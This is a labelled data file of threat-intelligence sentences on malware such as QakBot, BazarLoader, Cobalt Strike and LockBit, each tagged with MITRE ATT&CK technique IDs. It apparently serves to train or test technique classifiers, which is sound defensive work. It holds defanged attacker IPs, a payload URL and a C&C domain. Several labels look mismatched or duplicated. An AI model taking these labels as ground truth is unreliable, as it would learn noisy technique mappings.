{"text1":"The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.","labels":"['T1590.005', 'T1059.001', 'T1027.003', 'T1216', 'T1546.013', 'T1059', 'T1064']"}
{"text1":"The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201","labels":"['T1059', 'T1059.001', 'T1064', 'T1546.013', 'T1059.003']"}
{"text1":"This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the \u201cRc4_crypt\u201d function before connection.","labels":"['T1059.001']"}
{"text1":"In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.","labels":"['T1588.002', 'T1595']"}
{"text1":"Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded.","labels":"['T1140', 'T1001', 'T1588.001', 'T1587.001']"}
{"text1":"Earth Karkaddan actors are known to use the Crimson RAT malware in its campaigns to communicate with its command-and-control (C&C) server to download other malware or exfiltrate data.","labels":"['T1588.001', 'T1587.001', 'T1583.004']"}
{"text1":"After downloading and executing these files, one of the child processes created other files and the executable setup.exe\/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure.","labels":"['T1204.002']"}
{"text1":"The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry","labels":"['T1547.001', 'T1112', 'T1543.003']"}
{"text1":"These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network","labels":"['T1595', 'T1592']"}
{"text1":"The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file.","labels":"['T1137.001', 'T1587.001', 'T1588.001']"}
{"text1":"Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.","labels":"['T1588.001']"}
{"text1":"BazarLoader is Windows-based malware spread through various methods involving email","labels":"['T1588.001', 'T1587.001', 'T1566.002', 'T1566.001', 'T1534', 'T1598.002', 'T1566']"}
{"text1":"The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)","labels":"['T1574.005', 'T1574', 'T1569.002', 'T1543.003']"}
{"text1":"The spreadsheet\u2019s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL","labels":"['T1204.001']"}
{"text1":" this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.","labels":"['T1137.001', 'T1221']"}
{"text1":"Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.","labels":"['T1592', 'T1589', 'T1590', 'T1125', 'T1555.003', 'T1056', 'T1113', 'T1003']"}
{"text1":"Cobalt Strike leads to reconnaissance of an infected host\u2019s environment. In our lab environments, this reconnaissance activity can start within a few minutes after Cobalt Strike traffic first appears.","labels":"['T1588.001', 'T1587.001']"}
{"text1":"In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user\u2019s AppData\\Roaming directory","labels":"['T1564.003']"}
{"text1":"Cobalt Strike is an adversary simulation platform developed for penetration testers by Raphael Mudge, founder of Strategic Cyber LLC. Designed for interoperability with other platforms such as Metasploit, NMAP, and Powershell Empire, it can be run using Armitage, a graphic user interface (GUI) developed by Mudge, initially for Metasploit. Armitage and Cobalt Strike are designed around a team server that allows for the sharing of information and the ability to direct and execute well-coordinated actions.","labels":"['T1061']"}
{"text1":"Even though network monitoring and detection capabilities do not come easy for many organizations, they can generally offer a high return on investment if implemented correctly. Malware has to contact its C2 server if it is to receive further instructions. This article will demonstrate how to detect this communication before threat actors accomplish their objectives. There are a couple of factors that we can utilize to fingerprint any suspicious traffic and subsequent infrastructure. Before we get into that part, we should first discuss what makes Cobalt Strike so versatile.","labels":"['T1102.002', 'T1102.003']"}
{"text1":"Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to \u201cSYSTEM\u201d using named pipe impersonation.\u00a0","labels":"['T1569.002', 'T1068', 'T1546.013']"}
{"text1":"As days go by, more of the reported ransomware attacks turn out to be related to the new Pay2Key ransomware. The attacker followed the same procedure to gain a foothold, propagate and remotely control the infection within the compromised companies.","labels":"['T1189']"}
{"text1":"SUGARDUMP using SMTP for C2 communication \u2013 dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp:\/\/128.199.6[.]246\/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. ","labels":"['T1041']"}
{"text1":"Trickbot is the most common malware distributed by Emotet, but it is not the only one. Qakbot is another type of malware frequently dropped on Emotet-infected Windows hosts.","labels":"['T1588.001']"}
{"text1":"Essentially, the TDSS botnet kad.dll module is more or less the same as cmd.dll in terms of control function. By running nodes.dat files containing a list of IP addresses of Kad clients in addition to ktzerlrules, which contains a command to download a new nodes.dat file from cybercriminal servers, the owners of the botnet can both include their infected computers in the publicly accessible Kad network and remove them from the network. The publicly accessible Kad network contains no more than 10 TDSS infected computers. This makes replacing the ktzerules file as inefficient as possible, which prevents other cybercriminals from taking control over the botnet. The total number of TDSS infected computers on the closed network number tens of thousands.","labels":"['T1059', 'T1588.001', 'T1587.001']"}
{"text1":"We can apply this same concept across other executable traits, such as BOOSTWRITE\u2019s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.","labels":"['T1129']"}
{"text1":"HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.","labels":"['T1564']"}
{"text1":"As our research technique of fingerprinting exploit writers exceeded our initial expectations, we were on the lookout for more exploits to investigate. Soon enough, we came across this blog post from Kaspersky detailing how Sodin (a.k.a Sodinokibi, or REvil), an infamous ransomware, is using a 1-Day exploit for CVE-2018-8453.","labels":"['T1588.006', 'T1203', 'T1210']"}
{"text1":"The first spear phish from group \u201cAdmin@338\u201d was sent to a foreign government in the Asian Pacific region on March 10, 2014 \u2013 just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, \u201cMalaysian Airlines MH370.doc\u201d (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of \u201cdecoy content\u201d upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.","labels":"['T1566.001', 'T1203', 'T1566']"}
{"text1":"However, for version 3 things are different.\u00a0 This is how the report of the email_accounts_grabber module appears for Emotet version 3:","labels":"['T1129', 'T1588.001', 'T1586.002']"}
{"text1":"Skidmap, a Linux malware that we recently stumbled upon, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.","labels":"['T1588.001']"}
{"text1":"APT3\u00a0(also known as UPS), the actors responsible for\u00a0Operation Clandestine Fox\u00a0has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14.","labels":"['T1587.004', 'T1566.003', 'T1534']"}
{"text1":"In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.","labels":"['T1588.001']"}
{"text1":"We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system.","labels":"['T1566.001', 'T1204.002', 'T1566.002']"}
{"text1":"Although there are no previously known malicious Android applications attributed to the StrongPity group, we strongly believe that the threat actor is in the process of actively developing new malicious components that can be used to target Android platforms.","labels":"['T1505']"}
{"text1":"SHA256 file hashes for 119 malspam attachments, 30 extracted Redaman executable files, and 30 dropped Redaman DLL files found from September through December 2018. Information is available at: https:\/\/github.com\/pan-unit42\/iocs\/blob\/master\/Redaman_banking_malware\/2018-09-thru-2018-12-file-hashes-for-Redaman-banking-malware.txt .","labels":"['T1566.001', 'T1598.002']"}
{"text1":"It\u2019s clear from our research that the quality of the WannaCry code is poor and the developers made many mistakes, enabling many of those infected to recover encrypted data.\u00a0 The way the attackers handled ransom payments limited their ability to capitalise on the spread of the worm.\u00a0 Multiple attempts were made to track transactions to the bitcoin wallets used by the attackers.\u00a0 Although estimates of how much money the attackers made vary, they run into tens of thousands, rather than hundreds .","labels":"['T1486']"}
{"text1":"According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.","labels":"['T1566.001', 'T1598.002']"}
{"text1":"In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C.","labels":"['T1588.001']"}
{"text1":"We investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our public report.","labels":"['T1588.001', 'T1588.006']"}
{"text1":"Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.","labels":"['T1048.003']"}
{"text1":"In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. ","labels":"['T1584.002', 'T1583.002', 'T1496', 'T1189']"}
{"text1":"Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:","labels":"['T1203', 'T1588.006', 'T1566']"}
{"text1":"1) Function similarity \u2013 Important functions in both BYEBY and wincore.dll have almost the same implementation. One such function is the payloads\u2019 main thread function.","labels":"['T1588.001', 'T1055.003']"}
{"text1":"Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap.","labels":"['T1090.004']"}
{"text1":"Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.","labels":"['T1557.001', 'T1043', 'T1021.002']"}
{"text1":"With the amount of overlap between the other components in these separate campaigns, we decided to compare the Pirpi payloads delivered by the UPS group using CVE-2014-1776 and CVE-2015-3113. From here on, we will refer to these two payloads as Pirpi.2014 (CVE-2014-1776) and Pirpi.2015 (CVE-2015-3113), whose details are listed in Table 1. Unit 42 discovered several similarities between the two Pirpi variants, as well as a few equally important differences, both of which are worth discussing. We also compared the Pirpi.2014 and Pirpi.2015 payloads to other known Pirpi samples in an attempt to determine which variant they most closely resemble.","labels":"['T1588.006']"}
{"text1":"Next we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the IEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware.","labels":"['T1547.001', 'T1112']"}
{"text1":"Another infamous banker Trojan, Kronos, caught up with Edge in 2016. We checked out its capabilities on a Windows 10 virtual machine. In the code of the new Kronos version we found a function that checks the name and checksum of a process, as well as the hashes of the functions hooked by the malware.","labels":"['T1056.004']"}
{"text1":"CARROTBALL, initially discovered in an attack during October 2019, is a simple FTP downloader utility which facilitates the installation of SYSCON, a full-featured Remote Access Trojan (RAT) which leverages FTP for Command and Control (C2). It was found embedded in a malicious Word document sent as a phishing lure to a US government agency and two non-US foreign nationals professionally associated with North Korea.","labels":"['T1059', 'T1566']"}
{"text1":"The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims \u2013 it\u2019s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.","labels":"['T1587.001']"}
{"text1":"In my previous blog, I noted that a variant of the Cerber downloader was seen using BITS for a brief period of time and 10 out of these 11 samples were Microsoft Word documents leading to Cerber.","labels":"['T1197']"}
{"text1":"In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.","labels":"['T1592.004']"}
{"text1":"A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor\u2019s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the \u2018Winnti umbrella and linked groups\u2019, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.","labels":"['T1587.001']"}
{"text1":"Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the open window along with the logged keystrokes to a file at \u201c%temp%\\Save.tmp\u201d. The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:","labels":"['T1554']"}
{"text1":"AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.","labels":"['T1114', 'T1587.001']"}
{"text1":". . MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia.. . A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-of-the-land binaries (LoLBins).. . Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.. . Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.. . We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.. . . . ","labels":"['T1203']"}
{"text1":"Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit.","labels":"['T1539', 'T1555']"}
{"text1":"In recent years, malware delivery mechanisms have changed from fixed media (diskettes) to email (e.g. the infamous LoveLetter email worm) and direct network attacks (e.g. CodeRed). The most recent step in the evolution process is a move to delivering malware via the world wide web.","labels":"['T1102']"}
{"text1":"We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:","labels":"['T1552.004']"}
{"text1":"We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.","labels":"['T1588.001', 'T1554', 'T1195.002', 'T1574.005']"}
{"text1":"In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.","labels":"['T1595.002', 'T1046']"}
{"text1":"Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.","labels":"['T1025', 'T1543', 'T1005', 'T1091']"}
{"text1":"After decoding and decrypting with the XOR key \u201cDARKMATTER\u201d it gets the real C&C URL \u2018banhamm.com\u2018.","labels":"['T1140']"}
{"text1":"LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom","labels":"['T1486', 'T1588.001']"}
{"text1":"Vidar can also receive settings from the C&C that tells it exactly what to do.","labels":"['T1588.001']"}
{"text1":"LockBit 2.0 enumerates system information such as hostname, shares, and domain information","labels":"['T1082']"}
{"text1":"Once deployed, Prestige ransomware payloads will drop ransom notes named \"\"README.txt\"\" in the root directory of each drive it encrypts.","labels":"['T1486']"}
{"text1":"The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.","labels":"['T1484', 'T1053.005']"}
{"text1":"An attacker sends an e-mail with a malicious Tar archive attached.","labels":"['T1566.001', 'T1598.002']"}
{"text1":"QAKBOT can use VBS to download and execute malicious files","labels":"['T1588.001']"}
{"text1":"The PHP malware achieves persistence by adding scheduled tasks on the host to execute daily and at regular intervals. At the same time, a generated TMP file runs a parallel process to launch the stealer component.","labels":"['T1053', 'T1053.005']"}
{"text1":"Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.","labels":"['T1059.001', 'T1588.002']"}
{"text1":"The observed attack technique (OAT) detection indicates that the php-cgi process represents a \u201c\/bin\/bash\u201d shell\u201dand is directly reading \u201cpasswd\u201d, suggesting that the server might have been compromised","labels":"['T1059.004']"}
{"text1":"Uses BITSAdmin to download and install payloads.","labels":"['T1588.002']"}
{"text1":"Sideloading happens after the steps described earlier \u2014 the threat actor successfully exploited Log4j and downloaded mfeann.exe, LockDown.DLL, and c0000012.log.","labels":"['T1203']"}
{"text1":"This new version of SolidBit ransomware is a .NET compiled binary (Figure 7). After opening Runtime64.exe using the debugger and .NET assembly editor DnSpy, we found that this file was obfuscated","labels":"['T1027']"}
{"text1":"LockBit 2.0 has been seen using the PowerShell module InvokeGPUpdate to update the group policy.","labels":"['T1484.001', 'T1484.001']"}
{"text1":"Scheduled Task. It was quite common to see scheduled tasks used to create persistence for the ransomware executable, PsExec, and occasionally some defense evasion batch scripts.","labels":"['T1053.005']"}
{"text1":"Uses the chmod +x command to grant executable permissions to the ransomware.","labels":"['T1222.002']"}
{"text1":"Notably, one of the tools used in the attack exploited the CVE 2021 21551 vulnerability in a Dell driver in what was the first recorded abuse of this security flaw.","labels":"['T1211', 'T1190', 'T1588.006']"}
{"text1":"The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload","labels":"['T1021.002', 'T1053', 'T1053.005']"}
{"text1":"QAKBOT can maintain persistence by creating an auto-run Registry key","labels":"['T1547.001', 'T1587.001']"}
{"text1":"Ducktail has now replaced the older NET Core information-stealing malware used in previous campaigns with one written in PHP.","labels":"['T1587.001']"}
{"text1":"The ProxyShell elevation of privilege on the Exchange PowerShell Backend (CVE-2021-34523), Windows Background Intelligent Transfer Service (BITS) improperly handling symbolic links (CVE-2020-0787), and abusing the CMSTPLUA COM interface have all been seen as methods of privilege escalation.","labels":"['T1068']"}
{"text1":"Deletes some of its files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe, ssh.exe","labels":"['T1070.004']"}
{"text1":"Interestingly, the actors chose to leverage Cobalt Strike for lateral movement. The first of several beacon files are dropped onto the same infected endpoint running Brute Ratel C4, with the first being:","labels":"['T1588.002', 'T1588.001']"}
{"text1":"QAKBOT has gained execution through users opening malicious attachments","labels":"['T1204']"}
{"text1":"The malware will ultimately be extracted to the %LocalAppData%\\Packages\\PXT folder, which includes the PHP.exe local interpreter, various scripts used to steal information, and supporting tools, as shown below.","labels":"['T1059', 'T1588.001']"}
{"text1":"Amavis analyzes the e-mail attachments and inspects the contents of the attached archive. It invokes cpio and CVE-2015-1197 is triggered.","labels":"['T1566.001', 'T1546', 'T1588.006']"}
{"text1":"LockBit 2.0 has utilized a UAC bypass tool.","labels":"['T1548.002']"}
{"text1":"In some cases, LockBit 2.0 will limit the data transfer sizes to fly under the radar of any monitoring services a client may have set up.","labels":"['T1030', 'T1030']"}
{"text1":"The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks.","labels":"['T1505.003', 'T1566.001']"}
{"text1":"Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services","labels":"['T1569.002']"}
{"text1":"When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.","labels":"['T1059', 'T1202']"}
{"text1":"Both Advanced Port Scanner and NetScan have been used to discover local network infrastructure devices and services running on remote hosts. Active Directory queries for remote systems have been performed by ADFind.","labels":"['T1046', 'T1046']"}
{"text1":"QAKBOT has spread through emails with newly created malicious links.","labels":"['T1566.002']"}
{"text1":"Racealer (aka RaccoonStealer) is known to be a stealer-type malware that mostly extracts user credentials and exfiltrates data from compromised machines.","labels":"['T1552.001', 'T1588.001', 'T1020']"}
{"text1":"REvil reached its pinnacle of success in the first half of 2021, compromising thousands of companies in a Kaseya MSP supply-chain attack, demanding a $50 million payment from computer maker Acer, and extorting Apple using stolen blueprints of non-yet-released devices.","labels":"['T1588.001', 'T1189']"}
{"text1":"Executive: looks for a file with commands and executes them with cmd.exe. The output is saved to a file.","labels":"['T1059.003']"}
{"text1":"Uses Rundll32 to load and execute malicious DLL.","labels":"['T1218.011']"}
{"text1":"QAKBOT abuses Wscript to execute a Jscript file.","labels":"['T1059.007', 'T1587.001']"}
{"text1":"QAKBOT uses obfuscation across two script files, a JavaScript (.js) file and a Batch Script (.cmd) file, likely in an effort to conceal suspicious-looking command lines. ","labels":"['T1059', 'T1059.007', 'T1059.003', 'T1027']"}
{"text1":"Just six minutes after the initial C&C communication, and with the QAKBOT malware now running inside an injected process (wermgr.exe), automated reconnaissance in the infected environment is performed via the execution of multiple built-in command line tools","labels":"['T1055']"}
{"text1":"Initial QAKBOT .zip file bypasses some antivirus detections due to password protections.","labels":"['T1140', 'T1588.001']"}
{"text1":"Cobalt Strike can use rundll32.exe to load DLL from the command line","labels":"['T1218.011']"}
{"text1":"In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as \u201ca.\u201d","labels":"['T1136.001']"}
{"text1":"Vulnerabilities such as ProxyShell (CVE-2021-34473) and improper SQL sanitization (CVE-2021-20028) have been observed being utilized as footholds into the environment.","labels":"['T1588.006', 'T1190']"}
{"text1":"LockBit 2.0 is typically executed via command line arguments via a hidden window.Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities. ","labels":"['T1059']"}
{"text1":"As seen with other ransomware cases, Mimikatz is a key player in dumping credentials but LockBit 2.0 has been occasionally seen utilizing MiniDump as well.","labels":"['T1003', 'T1003']"}
{"text1":"QAKBOT can inject itself into processes like wermgr.exe","labels":"['T1055']"}
{"text1":"LockBit 2.0 has been known to self-propagate via SMB.","labels":"['T1021.002', 'T1021.002']"}
{"text1":"Scheduled Task. LockBit 2.0 can be executed via scheduled tasks.","labels":"['T1053.005']"}
{"text1":"There is a command ftpversion that uploads the version of the backdoor (hardcoded) to a file `ver.txt` on the FTP server, in the root folder for the target.","labels":"['T1059', 'T1105']"}
{"text1":"In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, Lazagne,\u2026 .","labels":"['T1588.001']"}
{"text1":"2. The perpetrators distributed PlugX messages to employees- personal addresses, claiming to come from fellow members of staff. The letters contained photos of alleged senders. Along with the photos, all the information about personal mailboxes could have been collected during the group-s initial presence on corporate workstations.","labels":"['T1114', 'T1598']"}
{"text1":"Androrat is an open source remote management tool developed by a team of four for a university project. Open source code was upload to the GitHub website in 2012. It is a remote management tool that allows remote control of mobile devices using a computer.","labels":"['T1588.001']"}
{"text1":"Office documents, databases, archives, and multimedia files are the usual file types targeted by ransomware. It\u2019s the same for this version of Erebus, which encrypts 433 file types. However, the ransomware appears to be coded mainly for targeting and encrypting web servers and data stored in them.","labels":"['T1486']"}
{"text1":"In the initial phases, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer; if the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server.","labels":"['T1583.002']"}
{"text1":"A few minutes after the initial execution, BazarLoader ran some discovery tasks using the built in Microsoft net and nltest utilities and transferred the results over the C2 channel.","labels":"['T1041']"}
{"text1":"When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: \u201cC:\\Users\\Public\\tmpdir\\file\u201d.\u00a0","labels":"['T1059', 'T1059.001']"}
{"text1":". The attackers have also used file names and export API names in the CRAT DLLs to masquerade the RAT as a benign application's library. Some examples of the exported function names are:. ","labels":"['T1140']"}
{"text1":"Samples associated with either RedAlpha campaign remain quite rare, with less than 20 samples identified across the two campaigns. Custom samples are coded in C++. The 2018 dropper relied on a rare C++ cross-platform framework called Haxe to string together pieces of publicly available source code largely found in Chinese-language forums and blogs.","labels":"['T1587.001']"}
{"text1":"Through manual reverse engineering, we were able to extract the main malicious Python modules from the Xbash executables and decompile them successfully. Therefore, in the later sections of this analysis, we show the Python source code.","labels":"['T1059.006']"}
{"text1":"The sample was first uploaded to VT on the 2018-10-12 from the Ukraine. It exhibits an encoding and a code style that are similar to those used by former series of Hades droppers. Nevertheless, it introduces new features like anti-analysis and delayed execution, which were only used by the second stage payload in the past.","labels":"['T1587.001']"}
{"text1":"This resembled the server-side ASPX payload of the China Chopper webshell documented previously. Uploads to VirusTotal in late August 2018 resembling the same filename, iisstart.aspx, indicate the deployed webshell was likely a version of the China Chopper webshell known to have been used by several Chinese threat actors.","labels":"['T1588.001']"}
{"text1":"If we look historically, BelialDemon has been involved in the development of malware loaders. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware.","labels":"['T1588.001']"}
{"text1":"FireEye\u2019s blog, \u201cHighly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims with SUNBURST Backdoor,\u201d contains a wealth of useful information, all of which has been analyzed by Unit 42 researchers to help ensure Palo Alto Networks customers are protected.","labels":"['T1195']"}
{"text1":"Towards the end of July, we observed an intrusion that began with IcedID malware and ended in XingLocker ransomware, a Mountlocker variant. XingLocker made its first appearance in early May of this year. The new group was featured in the AstroLocker ransomware blog, and it has been very active since then.","labels":"['T1588.001']"}
{"text1":"XLoader sets up an auto start by creating a new file with a random name in the LaunchAgents folder of the current user:","labels":"['T1543.001']"}
